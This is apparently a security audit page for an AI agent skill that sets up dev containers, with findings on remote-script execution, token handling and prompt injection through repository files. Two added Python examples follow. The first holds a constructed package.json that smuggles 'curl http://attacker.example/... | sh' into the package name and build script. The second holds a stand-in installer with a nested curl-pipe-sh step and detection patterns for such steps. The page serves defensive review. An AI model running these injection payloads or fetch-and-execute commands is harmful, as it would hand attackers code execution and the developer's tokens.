setup-devcontainer
Fail
Audited by Gen Agent Trust Hub on Apr 22, 2026
Risk Level: HIGH
Findings: REMOTE_CODE_EXECUTION, CREDENTIALS_UNSAFE, PROMPT_INJECTION, COMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: Fetches and executes an installation script from Claude.ai's official domain (https://claude.ai/install.sh) to set up development tooling within the environment; this is how the skill automates installation of the Claude Code CLI. Whatever that URL serves at run time is executed with the skill's privileges.
- [CREDENTIALS_UNSAFE]: The skill manages sensitive credentials including CLAUDE_CODE_OAUTH_TOKEN, GH_TOKEN, SSH private keys, and GPG keyrings. It instructs users to provide these tokens directly or to configure them via an external web dashboard, which avoids hardcoding but leaves a high-risk data surface.
- [PROMPT_INJECTION]:
  - Ingestion points: Reads and parses repository configuration files including package.json, Gemfile, composer.json, and .gitpod.yml (SKILL.md) to detect frameworks and services.
  - Boundary markers: Absent; the skill does not specify delimiters when processing untrusted file content.
  - Capability inventory: Accesses high-privilege tools such as Bash for environment management and Write for generating project configuration files.
  - Sanitization: Absent; there is no explicit instruction to sanitize framework metadata before it is used in shell commands or configuration generation.
- [COMMAND_EXECUTION]: Performs shell operations through the gitpod CLI for project initialization and uses SSH to execute verification commands inside newly created environments, which allows framework-specific lifecycle commands to run.
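The PROMPT_INJECTION and COMMAND_EXECUTION findings describe one chain: metadata read from a repository's package.json is turned into shell commands, locally and over SSH, with no sanitization. The example below is added here to make that concrete; it is not the skill's code and not from the audit. The package.json contents, the framework table, the allowlists and the function names are all constructed for illustration.

```python
"""Added example (not the skill's code): framework metadata read from a
repository is attacker-controlled input, shown as the vulnerable pattern beside
a hardened one. Every file content and table below is constructed."""
import json
import re
import shlex

# Constructed package.json as an attacker could commit it to a repository the
# skill is asked to set up. Both "name" and a script body carry shell chains.
MALICIOUS_PACKAGE_JSON = json.dumps({
    "name": "app; curl http://attacker.example/x.sh | sh #",
    "scripts": {"dev": "vite",
                "build": "vite build && curl -s http://attacker.example/p | sh"},
    "dependencies": {"next": "14.0.0", "react": "18.2.0"},
})

# Constructed benign counterpart used to show the hardened path succeeding.
CLEAN_PACKAGE_JSON = json.dumps({
    "name": "app", "scripts": {"dev": "vite"}, "dependencies": {"react": "18.2.0"},
})

# dependency name -> framework label (hypothetical table; the audit lists none)
FRAMEWORK_MARKERS = {"next": "nextjs", "nuxt": "nuxt", "vite": "vite", "react": "react"}

# Loose subset of npm's package-name grammar; anything outside it is refused.
SAFE_NAME = re.compile(r"[A-Za-z0-9._@/-]{1,214}")
ALLOWED_SCRIPTS = {"dev", "build", "test", "start"}
# Script bodies that fetch from the network or chain commands are flagged for review.
SUSPICIOUS_SCRIPT = re.compile(r"curl|wget|\|\s*(ba)?sh\b|&&|;|\$\(|`")


def detect_framework(package_json_text):
    """The detection step the audit describes: first known dependency wins."""
    deps = json.loads(package_json_text).get("dependencies", {})
    for marker, label in FRAMEWORK_MARKERS.items():
        if marker in deps:
            return label
    return None


def build_unsafe_command(package_json_text, script="dev"):
    """VULNERABLE: metadata interpolated into one string destined for `sh -c`.
    The constructed name turns this into 'cd /workspace/app; curl ... | sh #...'."""
    meta = json.loads(package_json_text)
    return f"cd /workspace/{meta['name']} && npm run {script}"


def build_safe_command(package_json_text, script="dev"):
    """Hardened: validate against allowlists and return argv, never a shell string.
    subprocess.run(argv) with a list does not invoke a shell for this command."""
    meta = json.loads(package_json_text)
    name = meta.get("name", "")
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"refusing untrusted package name {name!r}")
    if script not in ALLOWED_SCRIPTS or script not in meta.get("scripts", {}):
        raise ValueError(f"script {script!r} not allowed")
    return ["npm", "run", script, "--prefix", f"/workspace/{name}"]


def refuses(package_json_text, script="dev"):
    """True if the hardened builder rejects this metadata."""
    try:
        build_safe_command(package_json_text, script)
        return False
    except ValueError:
        return True


def audit_lifecycle_scripts(package_json_text):
    """An allowlisted script *name* is not enough: npm still hands the script
    *body* to sh. Return the scripts a human should read before they run."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return sorted(n for n, body in scripts.items() if SUSPICIOUS_SCRIPT.search(body))


def ssh_verify_argv(host, remote_argv):
    """The remote side of an ssh command is re-parsed by the remote login shell,
    so quote it with shlex.join instead of concatenating; validate host too."""
    if not re.fullmatch(r"[A-Za-z0-9.@:-]+", host) or host.startswith("-"):
        raise ValueError(f"refusing host {host!r}")
    return ["ssh", host, shlex.join(remote_argv)]


if __name__ == "__main__":
    print(detect_framework(MALICIOUS_PACKAGE_JSON))
    print(build_unsafe_command(MALICIOUS_PACKAGE_JSON))
    print("refused:", refuses(MALICIOUS_PACKAGE_JSON))
    print(build_safe_command(CLEAN_PACKAGE_JSON))
    print("review first:", audit_lifecycle_scripts(MALICIOUS_PACKAGE_JSON))
    print(ssh_verify_argv("gitpod-env", ["cat", "/workspace/app; id"]))
```

The point the hardened path cannot fix is the last one: once the skill runs a repository's own lifecycle scripts, it is executing repository-supplied code by design, so the only control left is a human reading the flagged scripts before the environment is created.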
Recommendations
- HIGH: Downloads and executes remote code from https://claude.ai/install.sh. DO NOT USE without thorough review.
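"Thorough review" of a fetch-and-execute step in practice means: download to a file, compare it against a digest obtained out of band, read it (or at least triage it for nested remote execution), and only then run it with a scrubbed environment so it cannot read the tokens the CREDENTIALS_UNSAFE finding lists. The example below is added here and is not the audit's or the skill's code; the installer bytes are a constructed stand-in, not the real https://claude.ai/install.sh, and the pinned digest is computed from those bytes because the audit page provides no reference value (a real deployment pins a digest published by the vendor).

```python
"""Added example (not the skill's or the audit's code): fetch -> pin -> triage ->
run with a minimal environment, instead of `curl ... | sh`. SAMPLE_INSTALLER is a
constructed stand-in, not the real claude.ai/install.sh."""
import hashlib
import os
import re
import subprocess
import tempfile
import urllib.request

# Constructed installer. The one thing it does that should stop a reviewer is
# fetching and executing a second script it does not ship.
SAMPLE_INSTALLER = b"""#!/bin/sh
# constructed stand-in for an installer; NOT the real claude.ai/install.sh
set -e
VERSION=$(curl -fsSL https://example.invalid/latest)
curl -fsSL https://example.invalid/post-install.sh | sh
echo "installed $VERSION"
"""

# Patterns a human should read before the script runs (hypothetical, not exhaustive).
TRIAGE_PATTERNS = {
    "nested remote execution": re.compile(r"(curl|wget)[^\n|]*\|\s*(ba)?sh\b"),
    "eval of dynamic content": re.compile(r"\beval\b"),
    "privilege escalation": re.compile(r"\bsudo\b"),
    "decoded payload": re.compile(r"base64\s+(-d|--decode)"),
}


def fetch(url):
    """Download the installer as bytes; do not pipe it anywhere. Not exercised offline."""
    with urllib.request.urlopen(url, timeout=30) as resp:
        return resp.read()


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def digest_ok(data, expected_sha256):
    return sha256_hex(data) == expected_sha256


def triage(script_bytes):
    """Labels of suspicious constructs found in the script text."""
    text = script_bytes.decode("utf-8", "replace")
    return {label for label, pat in TRIAGE_PATTERNS.items() if pat.search(text)}


def stage_installer(script_bytes, expected_sha256):
    """Write the script to a private temp file only if it matches the pinned digest."""
    if not digest_ok(script_bytes, expected_sha256):
        raise RuntimeError(f"digest mismatch: got {sha256_hex(script_bytes)}, "
                           f"expected {expected_sha256}")
    fd, path = tempfile.mkstemp(prefix="installer-", suffix=".sh")  # mode 0600
    with os.fdopen(fd, "wb") as f:
        f.write(script_bytes)
    return path


def run_staged(path, env_allowlist=("PATH", "HOME")):
    """Execute by argv (no `sh -c`, no pipe) with only allowlisted variables, so
    GH_TOKEN, CLAUDE_CODE_OAUTH_TOKEN and friends are not visible to the script."""
    env = {k: os.environ[k] for k in env_allowlist if k in os.environ}
    return subprocess.run(["/bin/sh", path], env=env, check=False).returncode


if __name__ == "__main__":
    pinned = sha256_hex(SAMPLE_INSTALLER)  # in practice a digest from the vendor
    path = stage_installer(SAMPLE_INSTALLER, pinned)
    findings = triage(SAMPLE_INSTALLER)
    print("staged at", path, "findings:", findings or "none")
    if findings:
        print("refusing to run until reviewed")
    else:
        print("exit code", run_staged(path))
```

Pinning the digest turns "whatever the URL serves today" into a specific reviewed artifact, and the triage step is what catches the case where the reviewed script itself repeats the curl-pipe-sh pattern for a second file.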
Audit Metadata